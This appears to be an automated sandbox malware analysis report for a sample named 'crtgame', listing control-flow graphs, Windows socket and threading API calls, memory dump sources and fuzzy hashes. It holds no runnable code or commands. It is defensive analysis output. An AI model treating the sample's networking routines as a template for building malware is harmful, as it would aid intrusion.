                                                                                            control_flow_graph 657 2a32db5-2a32dc8 658 2a32de4-2a32de8 657->658 659 2a32dca-2a32dd2 call 2a40510 657->659 661 2a32dea-2a32ded 658->661 662 2a32dfc-2a32e07 call 2a32d39 658->662 666 2a32dd8 659->666 661->662 664 2a32def-2a32dfa call 2a40510 661->664 668 2a32e0c-2a32e11 662->668 664->666 669 2a32ddb 666->669 671 2a32e13 668->671 672 2a32ddd-2a32de3 668->672 669->672 673 2a32e16-2a32e18 671->673 673->669 674 2a32e1a-2a32e35 call 2a40510 call 2a3166f 673->674 679 2a32e37-2a32e52 call 2a40510 call 2a3166f 674->679 680 2a32e54-2a32e97 WSASetLastError select call 2a39e92 674->680 679->669 679->680 686 2a32ea6 680->686 687 2a32e99-2a32ea4 call 2a40510 680->687 688 2a32eb6-2a32eb8 686->688 689 2a32ea8-2a32eb3 call 2a40510 686->689 694 2a32ebe-2a32ed2 call 2a32d39 687->694 688->669 688->694 689->688 694->673 698 2a32ed8 694->698 698->672
                                                                                            APIs
                                                                                              • Part of subcall function 02A32D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02A33390,00000001,?,00000000,?,?,?,?,?), ref: 02A32D47
                                                                                              • Part of subcall function 02A32D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02A32D5C
                                                                                            • WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02A32E6D
                                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02A32E83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Sendselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 2958345159-280543908
                                                                                            • Opcode ID: e547c7e264077bfbf8e711ed0a75886a3c77a306ceebf4b6b3d3b614237745d6
                                                                                            • Instruction ID: 8051b46338358ecb8cc1df79b0f5dbab8be8cd29192ab0c9ce7a33eb2067bb81
                                                                                            • Opcode Fuzzy Hash: e547c7e264077bfbf8e711ed0a75886a3c77a306ceebf4b6b3d3b614237745d6
                                                                                            • Instruction Fuzzy Hash: BE31BCB0E00319ABDB169FA0C9457EEBBEAEF44354F10885AED0597240EFB4D9408FA0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?), ref: 02A32AEA
                                                                                            • connect.WS2_32(00000010,?,?), ref: 02A32AF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastconnect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 374722065-280543908
                                                                                            • Opcode ID: 0b63a9c38a9f3929d9d6d56622b04fb33a19d5f4d05d6e80b1d8e3904e91db31
                                                                                            • Instruction ID: cd8fd1904e158d197dcadad9736c40484239394205b7f5b7bb951635a86bedbe
                                                                                            • Opcode Fuzzy Hash: 0b63a9c38a9f3929d9d6d56622b04fb33a19d5f4d05d6e80b1d8e3904e91db31
                                                                                            • Instruction Fuzzy Hash: CD21AA70D002146BDF15AFB4D5447EEBBBAEF84324F108599ED1997280EF7499019F91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 730 2a3353e-2a33555 call 2a54df0 733 2a33557-2a33571 call 2a31996 730->733 734 2a33576-2a3359c call 2a32edd 730->734 739 2a33688-2a33697 733->739 740 2a3359e-2a335a8 734->740 741 2a335ad-2a335c3 CreateIoCompletionPort 734->741 742 2a33684 740->742 743 2a335c5-2a335d9 GetLastError call 2a40510 741->743 744 2a335db-2a335e2 call 2a40510 741->744 747 2a33687 742->747 750 2a335e4-2a335ed 743->750 744->750 747->739 751 2a33626-2a33630 750->751 752 2a335ef-2a33624 call 2a40510 call 2a329ee 750->752 754 2a33632-2a33633 751->754 755 2a33640 751->755 752->747 758 2a33635-2a33638 754->758 759 2a3363a-2a3363e 754->759 756 2a33644-2a3366a call 2a3d87f 755->756 764 2a33671-2a33681 call 2a40510 756->764 765 2a3366c call 2a3143f 756->765 758->756 759->756 764->742 765->764
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 8e981d1d4e6ecb99cb714674b5141d65a57adff90690fdaba9288f1c5185b4b2
                                                                                            • Instruction ID: 5d25d5cc19d7b1dce0fe189b0624071f49e37872cf955a07281c614cca08f7fe
                                                                                            • Opcode Fuzzy Hash: 8e981d1d4e6ecb99cb714674b5141d65a57adff90690fdaba9288f1c5185b4b2
                                                                                            • Instruction Fuzzy Hash: EB510AB190521ADFCB09DF68D5416AABBB1FF08320F14859AF8299B390DB74D911CF91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 769 2a3369a-2a336b1 InterlockedIncrement 770 2a336b3-2a336b7 769->770 771 2a336b9-2a336c1 769->771 772 2a33722-2a3372d call 2a3247d 770->772 773 2a336c3-2a336ca 771->773 774 2a336cc-2a336fc WSARecv WSAGetLastError 771->774 780 2a3373a-2a3373c 772->780 773->772 776 2a33705-2a3370f 774->776 777 2a336fe-2a33703 774->777 779 2a33712-2a33715 776->779 777->779 781 2a33717-2a3371c 779->781 782 2a3372f-2a33735 call 2a32420 779->782 781->782 784 2a3371e-2a33721 781->784 782->780 784->772
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02A336A7
                                                                                              • Part of subcall function 02A32420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A32432
                                                                                              • Part of subcall function 02A32420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A32445
                                                                                              • Part of subcall function 02A32420: RtlEnterCriticalSection.NTDLL(?), ref: 02A32454
                                                                                              • Part of subcall function 02A32420: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32469
                                                                                              • Part of subcall function 02A32420: RtlLeaveCriticalSection.NTDLL(?), ref: 02A32470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1601054111-0
                                                                                            • Opcode ID: 66c702eee6b89792e4078a10987c3a4d3f5cae7138d9994dd4aa24836208f76f
                                                                                            • Instruction ID: ff20824e7d1a80ff368d7638b5311ac3969ee0e45a1e6864b1702af9b585b523
                                                                                            • Opcode Fuzzy Hash: 66c702eee6b89792e4078a10987c3a4d3f5cae7138d9994dd4aa24836208f76f
                                                                                            • Instruction Fuzzy Hash: 7011BFB5108208EBDF228F14DC85BAB7BA9EF00360F108556FE16D6690CF34D861CBD4
                                                                                            APIs
                                                                                            • __beginthreadex.LIBCMT ref: 02A41B06
                                                                                            • CloseHandle.KERNEL32(?,00000000,?,?,?,?,02A3A5DA,00000000), ref: 02A41B37
                                                                                            • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02A3A5DA,00000000), ref: 02A41B45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                                            • String ID:
                                                                                            • API String ID: 1685284544-0
                                                                                            • Opcode ID: 79995047fd66a3250c905cfdf32cd2ceec9acd35f7f59fb70616175e8e4571b1
                                                                                            • Instruction ID: 3cf77133b10649a595dcd8e09bd53de3876a944ed6365008df4c49812a1d2166
                                                                                            • Opcode Fuzzy Hash: 79995047fd66a3250c905cfdf32cd2ceec9acd35f7f59fb70616175e8e4571b1
                                                                                            • Instruction Fuzzy Hash: CDF06271740204ABEB209F6DDCC4F91B3E8EF88725F24056AF658D7290DF71E8939A90
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(02A67524), ref: 02A31ABA
                                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 02A31ACB
                                                                                            • InterlockedExchange.KERNEL32(02A67528,00000000), ref: 02A31AD7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                                            • String ID:
                                                                                            • API String ID: 1856147945-0
                                                                                            • Opcode ID: 46b8a38e1f3353d7847286016adc73ded9822f9ffb12803a81d35348299d17fd
                                                                                            • Instruction ID: 4358baf95633c7c8b6c7ba8748a00959553b9cff790827ebb9200fed09cfca9e
                                                                                            • Opcode Fuzzy Hash: 46b8a38e1f3353d7847286016adc73ded9822f9ffb12803a81d35348299d17fd
                                                                                            • Instruction Fuzzy Hash: 14D05EB1D907146BF21067A4AC0EA7AF7ACFB04719F400A91FD7AD10C0EF50AD24C5A7
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A34B1D
                                                                                              • Part of subcall function 02A31BA7: __EH_prolog.LIBCMT ref: 02A31BAC
                                                                                              • Part of subcall function 02A31BA7: RtlEnterCriticalSection.NTDLL ref: 02A31BBC
                                                                                              • Part of subcall function 02A31BA7: RtlLeaveCriticalSection.NTDLL ref: 02A31BEA
                                                                                              • Part of subcall function 02A31BA7: RtlEnterCriticalSection.NTDLL ref: 02A31C13
                                                                                              • Part of subcall function 02A31BA7: RtlLeaveCriticalSection.NTDLL ref: 02A31C56
                                                                                              • Part of subcall function 02A3DA84: __EH_prolog.LIBCMT ref: 02A3DA89
                                                                                              • Part of subcall function 02A3DA84: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A3DB08
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02A34C1D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                            • String ID:
                                                                                            • API String ID: 1927618982-0
                                                                                            • Opcode ID: 6bc569326f98703b0e7d72aa04f5a3bddfc4b93e8ff9d0c598310010fd9e805d
                                                                                            • Instruction ID: dd817389c3832c0dcc7012b562cd3c41ed88612e63559c0331212fa1f2e6ed44
                                                                                            • Opcode Fuzzy Hash: 6bc569326f98703b0e7d72aa04f5a3bddfc4b93e8ff9d0c598310010fd9e805d
                                                                                            • Instruction Fuzzy Hash: 51510CB1D04248DFDB16DFA8C984AEEFFB5AF08314F14815AE906A7351DB709A44CF60
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02A33390,00000001,?,00000000,?,?,?,?,?), ref: 02A32D47
                                                                                            • WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02A32D5C
                                                                                              • Part of subcall function 02A39E92: WSAGetLastError.WS2_32(?,00000080,00000017,02A33114), ref: 02A39EA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Send
                                                                                            • String ID:
                                                                                            • API String ID: 1282938840-0
                                                                                            • Opcode ID: 7bf488fcd5b4b377c6e45b425fc3c0afa10f0f352f9066a95509a0cc0809ba30
                                                                                            • Instruction ID: 51a66d63107dd6d65e14b74b627120f9b4f433cc63c6c42cd2d56b9f67487d05
                                                                                            • Opcode Fuzzy Hash: 7bf488fcd5b4b377c6e45b425fc3c0afa10f0f352f9066a95509a0cc0809ba30
                                                                                            • Instruction Fuzzy Hash: F70171B5940319AFD7215F94C98496FBBEDFB843A0B20496EF95997200EF70DD008BA1
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,00000000,?,02A3752F,?,02A674D8,02A674D8,?,?,02A674D8,00000000,000007E7), ref: 02A37D90
                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 02A37D99
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastshutdown
                                                                                            • String ID:
                                                                                            • API String ID: 1920494066-0
                                                                                            • Opcode ID: 1425114cfed0817f48e50ca860f02ead317648ef8a56ea3572d9bf12895e9003
                                                                                            • Instruction ID: fe34d1d24c6839fa4a2daa7052e794be9794c44df3492d69dda2fe433b5d6c80
                                                                                            • Opcode Fuzzy Hash: 1425114cfed0817f48e50ca860f02ead317648ef8a56ea3572d9bf12895e9003
                                                                                            • Instruction Fuzzy Hash: 9BF06D71A403259FD711AF64D900B6AB7E5EF48320F108859E99597380EF70A8008FA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A35049
                                                                                              • Part of subcall function 02A33D7E: htons.WS2_32(?), ref: 02A33DA2
                                                                                              • Part of subcall function 02A33D7E: htonl.WS2_32(00000000), ref: 02A33DB9
                                                                                              • Part of subcall function 02A33D7E: htonl.WS2_32(00000000), ref: 02A33DC0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: htonl$H_prologhtons
                                                                                            • String ID:
                                                                                            • API String ID: 4039807196-0
                                                                                            • Opcode ID: f925de801b2bf09557c9b70d5f50e3c8e471a3c9fae5e2bc659a54749d95d0e4
                                                                                            • Instruction ID: 2bad320e3e5972b6cebaa44224be6ddec09997d3721189920d62156475516410
                                                                                            • Opcode Fuzzy Hash: f925de801b2bf09557c9b70d5f50e3c8e471a3c9fae5e2bc659a54749d95d0e4
                                                                                            • Instruction Fuzzy Hash: C98148B1D4025E9ECF06DFE8D580AEEFBB5AF48310F10815AE854B7240EB355A05CFA0
                                                                                            APIs
                                                                                            • SHGetSpecialFolderPathA.SHELL32 ref: 02AB3C08
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A6A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A6A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a6a000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderPathSpecial
                                                                                            • String ID:
                                                                                            • API String ID: 994120019-0
                                                                                            • Opcode ID: 150eabab00ed319004a381af93edff15746af059d6f968e0e1cf10c3179792d4
                                                                                            • Instruction ID: 57750a5edbedf2d1bc893181307140ffb5ae1644e36c942e1cf117f97bb977a6
                                                                                            • Opcode Fuzzy Hash: 150eabab00ed319004a381af93edff15746af059d6f968e0e1cf10c3179792d4
                                                                                            • Instruction Fuzzy Hash: 892191B260C614AFE7057A18EC467BABBE4EF84720F06893EE7C446750EA315845C6D7
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3E352
                                                                                              • Part of subcall function 02A31A01: TlsGetValue.KERNEL32 ref: 02A31A0A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologValue
                                                                                            • String ID:
                                                                                            • API String ID: 3700342317-0
                                                                                            • Opcode ID: 889ac72f4424f3bdd813d5fed9e65928fb3e9b80df4e84d98eeed40eb2b6acac
                                                                                            • Instruction ID: be094978002dac014544c84dd8f677653997347d9164daf6887c4ceedd01a7d2
                                                                                            • Opcode Fuzzy Hash: 889ac72f4424f3bdd813d5fed9e65928fb3e9b80df4e84d98eeed40eb2b6acac
                                                                                            • Instruction Fuzzy Hash: 2C212CB2904209AFDB05DFA5D640AEFBBF9EF48310F10456EF905E7240DB71A911CBA1
                                                                                            APIs
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02A333CC
                                                                                              • Part of subcall function 02A332AB: __EH_prolog.LIBCMT ref: 02A332B0
                                                                                              • Part of subcall function 02A332AB: RtlEnterCriticalSection.NTDLL(?), ref: 02A332C3
                                                                                              • Part of subcall function 02A332AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02A332EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                            • String ID:
                                                                                            • API String ID: 1518410164-0
                                                                                            • Opcode ID: e824ffa1bda977d2b144c1988b26e88d242bd986583b5a557573d507be82eb70
                                                                                            • Instruction ID: 3535ce1cd55664a03d29c0c4b11e3871638860469275f6f9b31cdcf992bfcccf
                                                                                            • Opcode Fuzzy Hash: e824ffa1bda977d2b144c1988b26e88d242bd986583b5a557573d507be82eb70
                                                                                            • Instruction Fuzzy Hash: 47012D71654606AFDB059F59D885B56FBA9FF45321B10835AF828872C0EF70E821CBA4
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3DEE2
                                                                                              • Part of subcall function 02A326DB: RtlEnterCriticalSection.NTDLL(?), ref: 02A32706
                                                                                              • Part of subcall function 02A326DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02A3272B
                                                                                              • Part of subcall function 02A326DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A55553), ref: 02A32738
                                                                                              • Part of subcall function 02A326DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02A32778
                                                                                              • Part of subcall function 02A326DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02A327D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4293676635-0
                                                                                            • Opcode ID: 54785b042d669c001653a106cabfab41e81fad4197b23e8740368f86fc81c47e
                                                                                            • Instruction ID: 347b8e600ef624e79ea42bdef4cb37c949e7ffd422f98178c2c2fabbc191170e
                                                                                            • Opcode Fuzzy Hash: 54785b042d669c001653a106cabfab41e81fad4197b23e8740368f86fc81c47e
                                                                                            • Instruction Fuzzy Hash: CB0190B1900B14DFC318CF1AC640946FBF5EF88710B15C5AED8498B721EB719A40CF94
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A3DCC1
                                                                                              • Part of subcall function 02A4354C: _malloc.LIBCMT ref: 02A43564
                                                                                              • Part of subcall function 02A3DEDD: __EH_prolog.LIBCMT ref: 02A3DEE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 4254904621-0
                                                                                            • Opcode ID: 60e774225f983ed7cd7557d659c0103c5b28a6efe47937ef009b11aedfd35ee2
                                                                                            • Instruction ID: 2ff7b76ac42027d220c778f2fd9d07802a21d255f5aedb85f409ef671f37501a
                                                                                            • Opcode Fuzzy Hash: 60e774225f983ed7cd7557d659c0103c5b28a6efe47937ef009b11aedfd35ee2
                                                                                            • Instruction Fuzzy Hash: 5AE08CB1A94609AFCB1E9FA8DA0072E77A2EB44700F1046AEB80892240DF708A008A01
                                                                                            APIs
                                                                                              • Part of subcall function 02A4565A: __getptd_noexit.LIBCMT ref: 02A4565B
                                                                                              • Part of subcall function 02A4565A: __amsg_exit.LIBCMT ref: 02A45668
                                                                                              • Part of subcall function 02A42E93: __getptd_noexit.LIBCMT ref: 02A42E97
                                                                                              • Part of subcall function 02A42E93: __freeptd.LIBCMT ref: 02A42EB1
                                                                                              • Part of subcall function 02A42E93: RtlExitUserThread.NTDLL(?,00000000,?,02A42E73,00000000), ref: 02A42EBA
                                                                                            • __XcptFilter.LIBCMT ref: 02A42E7F
                                                                                              • Part of subcall function 02A48794: __getptd_noexit.LIBCMT ref: 02A48798
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                            • String ID:
                                                                                            • API String ID: 1405322794-0
                                                                                            • Opcode ID: 79187c8f188a840a2bc312e660bd86a0cc78f4f0d8b4106b32822bf4dd9bcbf3
                                                                                            • Instruction ID: f0be0dfded3d92b1ced1f981b890fd16d32f520a01c526bb60d0a47f8bc14ba9
                                                                                            • Opcode Fuzzy Hash: 79187c8f188a840a2bc312e660bd86a0cc78f4f0d8b4106b32822bf4dd9bcbf3
                                                                                            • Instruction Fuzzy Hash: EEE0E6B1981604DFE704BBA0DD49F2D7766AF44301F200445E10157260DE78D9409E21
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A6A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A6A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a6a000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                                            • Instruction ID: 511e3b761d5faa5590b6a767b3e5c2dfba067eb5171950d896da395e0bb45f8b
                                                                                            • Opcode Fuzzy Hash: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                                            • Instruction Fuzzy Hash: A11172B210C3089FE3157E6DEC956BAB7E9EF84620F06492EE6C1C3600DA326544C697
                                                                                            APIs
                                                                                              • Part of subcall function 02A41010: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02A410B0
                                                                                              • Part of subcall function 02A41010: CloseHandle.KERNEL32(00000000), ref: 02A410C5
                                                                                              • Part of subcall function 02A41010: ResetEvent.KERNEL32(00000000), ref: 02A410CF
                                                                                              • Part of subcall function 02A41010: CloseHandle.KERNEL32(00000000,E756C9BC), ref: 02A41104
                                                                                            • TlsSetValue.KERNEL32(00000025,?), ref: 02A41BAA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                                            • String ID:
                                                                                            • API String ID: 1556185888-0
                                                                                            • Opcode ID: 41b5b273501aa8fb4701979f874bb7cfde6229b03646159c5d27a6e11eff6bd7
                                                                                            • Instruction ID: 06a8bf721d6c2bee9eae5f874fcb16a2b886d9a6f23e4f69036ae55ab345f5e1
                                                                                            • Opcode Fuzzy Hash: 41b5b273501aa8fb4701979f874bb7cfde6229b03646159c5d27a6e11eff6bd7
                                                                                            • Instruction Fuzzy Hash: 1A01D471A44204BBD700CF58DC49B5ABBB8FB45B60F004766E825D3780DF31E8008A90
                                                                                            APIs
                                                                                              • Part of subcall function 02A39462: __EH_prolog.LIBCMT ref: 02A39467
                                                                                              • Part of subcall function 02A39462: _Allocate.LIBCPMT ref: 02A394BE
                                                                                            • _memset.LIBCMT ref: 02A40339
                                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02A403A2
                                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02A403AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memset
                                                                                            • String ID: Unknown error$invalid string position
                                                                                            • API String ID: 2731337147-1837348584
                                                                                            • Opcode ID: bf2d4b94bff69c0f9820f6071935033432962effb3a532331a3507f717ee390f
                                                                                            • Instruction ID: 65464fcc57937b1dc1019468fa6ec43710ebbf5257150f6b3790be07682d4c85
                                                                                            • Opcode Fuzzy Hash: bf2d4b94bff69c0f9820f6071935033432962effb3a532331a3507f717ee390f
                                                                                            • Instruction Fuzzy Hash: 465198716083419FEB18CF24C890B2FBBE4BB98708F90492DF58197691DF75E588CB92
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02A44896,?,?,?,00000001), ref: 02A48F2D
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02A48F36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 492e8d19455bb173cf4f9ada8d779fa14e36879b378c95f0bf118625402db9d0
                                                                                            • Instruction ID: 5269c2a295af32dd40fdce0c92a9aec737ae53fb1a18ef0ae22acfb65eae908d
                                                                                            • Opcode Fuzzy Hash: 492e8d19455bb173cf4f9ada8d779fa14e36879b378c95f0bf118625402db9d0
                                                                                            • Instruction Fuzzy Hash: 05B09231484318EBCA412B91EC09B9ABFA8EF04762F404850F60E54061CF7294229AA2
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A324E6
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02A324FC
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A3250E
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A3256D
                                                                                            • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02A3257F
                                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02A32599
                                                                                            • GetLastError.KERNEL32(?,7591DFB0), ref: 02A325A2
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A325F0
                                                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 02A3262F
